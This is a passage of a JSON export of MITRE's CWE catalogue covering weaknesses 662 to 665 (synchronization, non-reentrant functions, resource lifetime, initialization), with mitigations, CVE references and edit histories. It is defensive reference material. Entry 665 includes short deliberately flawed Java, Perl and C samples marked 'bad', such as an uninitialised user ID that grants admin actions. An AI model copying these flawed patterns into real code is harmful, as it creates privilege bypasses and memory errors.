Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"662":{"attr":{"@_ID":"662","@_Name":"Improper Synchronization","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software utilizes multiple threads or processes to allow temporary access to a shared resource that can only be exclusive to one process at a time, but it does not properly synchronize these actions, which might cause simultaneous accesses of this resource by multiple threads or processes.","Extended_Description":{"xhtml:p":"Synchronization refers to a variety of behaviors and mechanisms that allow two or more independently-operating processes or threads to ensure that they operate on shared resources in predictable ways that do not interfere with each other.  Some shared resource operations cannot be executed atomically; that is, multiple steps must be guaranteed to execute sequentially, without any interference by other processes.  Synchronization mechanisms vary widely, but they may include locking, mutexes, and semaphores.  When a multi-step operation on a shared resource cannot be guaranteed to execute independent of interference, then the resulting behavior can be unpredictable. Improper synchronization could lead to data or memory corruption, denial of service, etc."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"691","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"362","@_View_ID":"1000"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Other"],"Impact":["Modify Application Data","Read Application Data","Alter Execution Logic"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Use industry standard APIs to synchronize your code."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"SIG00-C","Entry_Name":"Mask signals handled by noninterruptible signal handlers"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"SIG31-C","Entry_Name":"Do not access shared objects in signal handlers","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"State synchronization error"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"VNA03-J","Entry_Name":"Do not assume that a group of calls to independently atomic methods is atomic"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP19","Entry_Name":"Missing Lock"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"25"}},{"attr":{"@_CAPEC_ID":"26"}},{"attr":{"@_CAPEC_ID":"27"}},{"attr":{"@_CAPEC_ID":"29"}}]},"Notes":{"Note":{"#text":"Deeper research is necessary for synchronization and related mechanisms, including locks, mutexes, semaphores, and other mechanisms. Multiple entries are dependent on this research, which includes relationships to concurrency, race conditions, reentrant functions, etc.  CWE-662 and its children - including CWE-667, CWE-820, CWE-821, and others - may need to be modified significantly, along with their relationships.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2008-04-11","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-23","Modification_Comment":"updated Description, Maintenance_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Insufficient Synchronization","attr":{"@_Date":"2010-09-27"}}}},"663":{"attr":{"@_ID":"663","@_Name":"Use of a Non-reentrant Function in a Concurrent Context","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software calls a non-reentrant function in a concurrent context in which a competing code sequence (e.g. thread or signal handler) may have an opportunity to call the same function or otherwise influence its state.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Other"],"Impact":["Modify Memory","Read Memory","Modify Application Data","Read Application Data","Alter Execution Logic"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Use reentrant functions if available."},{"Phase":"Implementation","Description":"Add synchronization to your non-reentrant function."},{"Phase":"Implementation","Description":"In Java, use the ReentrantLock Class."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-1349","Description":"unsafe calls to library functions from signal handler","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1349"},{"Reference":"CVE-2004-2259","Description":"SIGCHLD signal to FTP server can cause crash under heavy load while executing non-reentrant functions like malloc/free.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2259"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"29"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-547","@_Section":"Class ReentrantLock"}},{"attr":{"@_External_Reference_ID":"REF-548"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2008-04-11","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated References, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Name, Observed_Examples, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Common_Consequences"}],"Previous_Entry_Name":[{"#text":"Use of a Non-reentrant Function in an Unsynchronized Context","attr":{"@_Date":"2010-09-27"}},{"#text":"Use of a Non-reentrant Function in a Multithreaded Context","attr":{"@_Date":"2010-12-13"}}]}},"664":{"attr":{"@_ID":"664","@_Name":"Improper Control of a Resource Through its Lifetime","@_Abstraction":"Pillar","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not maintain or incorrectly maintains control over a resource throughout its lifetime of creation, use, and release.","Extended_Description":{"xhtml:p":["Resources often have explicit instructions on how to be created, used and destroyed. When software does not follow these instructions, it can lead to unexpected behaviors and potentially exploitable states.","Even without explicit instructions, various principles are expected to be adhered to, such as \\"Do not use an object until after its creation is complete,\\" or \\"do not use an object after it has been slated for destruction.\\""]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Testing","Description":"Use Static analysis tools to check for unreleased resources."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO39-C","Entry_Name":"Do not alternately input and output from a stream without an intervening flush or positioning call","Mapping_Fit":"CWE More Abstract"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"196"}},{"attr":{"@_CAPEC_ID":"21"}},{"attr":{"@_CAPEC_ID":"60"}},{"attr":{"@_CAPEC_ID":"61"}},{"attr":{"@_CAPEC_ID":"62"}}]},"Notes":{"Note":{"#text":"More work is needed on this entry and its children. There are perspective/layering issues; for example, one breakdown is based on lifecycle phase (CWE-404, CWE-665), while other children are independent of lifecycle, such as CWE-400. Others do not specify as many bases or variants, such as CWE-704, which primarily covers numbers at this stage.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Maintenance_Notes, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes, Relationships"}],"Previous_Entry_Name":{"#text":"Insufficient Control of a Resource Through its Lifetime","attr":{"@_Date":"2009-05-27"}}}},"665":{"attr":{"@_ID":"665","@_Name":"Improper Initialization","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not initialize or incorrectly initializes a resource, which might leave the resource in an unexpected state when it is accessed or used.","Extended_Description":"This can have security implications when the associated resource is expected to have certain properties or values, such as a variable that determines whether a user has been authenticated or not.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Resultant"}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation","Note":"This weakness can occur in code paths that are not well-tested, such as rare error conditions. This is because the use of uninitialized data would be noticed as a bug during frequently-used functionality."},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":["Read Memory","Read Application Data"],"Note":"When reusing a resource such as memory or a program variable, the original contents of that resource may not be cleared before it is sent to an untrusted party."},{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"If security-critical decisions rely on a variable having a \\"0\\" or equivalent value, and the programming language performs this initialization on behalf of the programmer, then a bypass of security may occur."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"The uninitialized data may contain values that cause program flow to change in ways that the programmer did not intend. For example, if an uninitialized variable is used as an array index in C, then its previous contents may produce an index that is outside the range of the array, possibly causing a crash or an exit in other environments."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-2"},"Method":"Automated Dynamic Analysis","Description":{"xhtml:p":["This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results.","Initialization problems may be detected with a stress-test by calling the software simultaneously from a large number of threads or processes, and look for evidence of any unexpected behavior. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results."]},"Effectiveness":"Moderate"},{"attr":{"@_Detection_Method_ID":"DM-12"},"Method":"Manual Dynamic Analysis","Description":"Identify error conditions that are not likely to occur during normal usage and trigger them. For example, run the program under low memory conditions, run with insufficient privileges or permissions, interrupt a transaction before it is completed, or disable connectivity to basic network services such as DNS. Monitor the software for any unexpected behavior. If you trigger an unhandled exception or similar error that was discovered and handled by the application\'s environment, it may still indicate unexpected conditions that were not handled by the application itself."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-3"},"Phase":"Requirements","Strategy":"Language Selection","Description":{"xhtml:p":["Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, in Java, if the programmer does not explicitly initialize a variable, then the code could produce a compile-time error (if the variable is local) or automatically initialize the variable to the default value for the variable\'s type. In Perl, if explicit initialization is not performed, then a default value of undef is assigned, which is interpreted as 0, false, or an equivalent value depending on the context in which the variable is accessed."]}},{"Phase":"Architecture and Design","Description":"Identify all variables and data stores that receive information from external sources, and apply input validation to make sure that they are only initialized to expected values."},{"Phase":"Implementation","Description":"Explicitly initialize all your variables and other data stores, either during declaration or just before the first usage."},{"Phase":"Implementation","Description":"Pay close attention to complex conditionals that affect initialization, since some conditions might not perform the initialization."},{"Phase":"Implementation","Description":"Avoid race conditions (CWE-362) during initialization routines."},{"Phase":"Build and Compilation","Description":"Run or compile your software with settings that generate warnings about uninitialized variables or data."},{"Phase":"Testing","Description":"Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-105"},"Intro_Text":"Here, a boolean initiailized field is consulted to ensure that initialization tasks are only completed once. However, the field is mistakenly set to true during static initialization, so the initialization code is never reached.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"private boolean initialized = true;public void someMethod() {","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (!initialized) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...initialized = true;","xhtml:br":["","","",""],"xhtml:i":"// perform initialization tasks"}}}}}}},{"attr":{"@_Demonstrative_Example_ID":"DX-54"},"Intro_Text":"The following code intends to limit certain operations to the administrator only.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"$username = GetCurrentUser();$state = GetStateData($username);if (defined($state)) {}if ($uid == 0) {}","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"$uid = ExtractUserID($state);","attr":{"@_style":"margin-left:10px;"}},{"#text":"DoAdminThings();","attr":{"@_style":"margin-left:10px;"}}],"xhtml:i":"# do stuff"}},"Body_Text":"If the application is unable to extract the state information - say, due to a database timeout - then the $uid variable will not be explicitly set by the programmer. This will cause $uid to be regarded as equivalent to \\"0\\" in the conditional, allowing the original user to perform administrator actions. Even if the attacker cannot directly influence the state data, unexpected errors could cause incorrect privileges to be assigned to a user just by accident."},{"attr":{"@_Demonstrative_Example_ID":"DX-106"},"Intro_Text":"The following code intends to concatenate a string to a variable and print the string.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char str[20];strcat(str, \\"hello world\\");printf(\\"%s\\", str);","xhtml:br":["",""]}},"Body_Text":["This might seem innocent enough, but str was not initialized, so it contains random memory. As a result, str[0] might not contain the null terminator, so the copy might start at an offset other than 0. The consequences can vary, depending on the underlying memory.","If a null terminator is found before str[8], then some bytes of random garbage will be printed before the \\"hello world\\" string. The memory might contain sensitive information from previous uses, such as a password (which might occur as a result of CWE-14 or CWE-244). In this example, it might not be a big deal, but consider what could happen if large amounts of memory are printed out before the null terminator is found.","If a null terminator isn\'t found before str[8], then a buffer overflow could occur, since strcat will first look for the null terminator, then copy 12 bytes starting with that location. Alternately, a buffer over-read might occur (CWE-126) if a null terminator isn\'t found before the end of the memory segment is reached, leading to a segmentation fault and crash."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-1471","Description":"chain: an invalid value prevents a library file from being included, skipping initialization of key variables, leading to resultant eval injection.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1471"},{"Reference":"CVE-2008-3637","Description":"Improper error checking in protection mechanism produces an uninitialized variable, allowing security bypass and code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3637"},{"Reference":"CVE-2008-4197","Description":"Use of uninitialized memory may allow code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4197"},{"Reference":"CVE-2008-2934","Description":"Free of an uninitialized pointer leads to crash and possible code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2934"},{"Reference":"CVE-2007-3749","Description":"OS kernel does not reset a port when starting a setuid program, allowing local users to access the port and gain privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3749"},{"Reference":"CVE-2008-0063","Description":"Product does not clear memory contents when generating an error message, leading to information leak.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0063"},{"Reference":"CVE-2008-0062","Description":"Lack of initialization triggers NULL pointer dereference or double-free.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0062"},{"Reference":"CVE-2008-0081","Description":"Uninitialized variable leads to code execution in popular desktop application.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0081"},{"Reference":"CVE-2008-3688","Description":"chain: Uninitialized variable leads to infinite loop.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3688"},{"Reference":"CVE-2008-3475","Description":"chain: Improper initialization leads to memory corruption.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3475"},{"Reference":"CVE-2008-5021","Description":"Composite: race condition allows attacker to modify an object while it is still being initialized, causing software to access uninitialized memory.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5021"},{"Reference":"CVE-2005-1036","Description":"Chain: Bypass of access restrictions due to improper authorization (CWE-862) of a user results from an improperly initialized (CWE-909) I/O permission bitmap","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1036"},{"Reference":"CVE-2008-3597","Description":"chain: game server can access player data structures before initialization has happened leading to NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3597"},{"Reference":"CVE-2009-2692","Description":"chain: uninitialized function pointers can be dereferenced allowing code execution","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2692"},{"Reference":"CVE-2009-0949","Description":"chain: improper initialization of memory can lead to NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0949"},{"Reference":"CVE-2009-3620","Description":"chain: some unprivileged ioctls do not verify that a structure has been initialized before invocation, leading to NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3620"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Incorrect initialization"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR02-C","Entry_Name":"Explicitly specify array bounds, even if implicitly defined by an initializer"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"DCL00-J","Entry_Name":"Prevent class initialization cycles"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP4","Entry_Name":"Unchecked Status Condition"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"26"}},{"attr":{"@_CAPEC_ID":"29"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-436"}},{"attr":{"@_External_Reference_ID":"REF-437"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 7, &#34;Variable Initialization&#34;, Page 312"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Likelihood_of_Exploit, Modes_of_Introduction, Name, Observed_Examples, Potential_Mitigations, References, Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Detection_Factors, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content 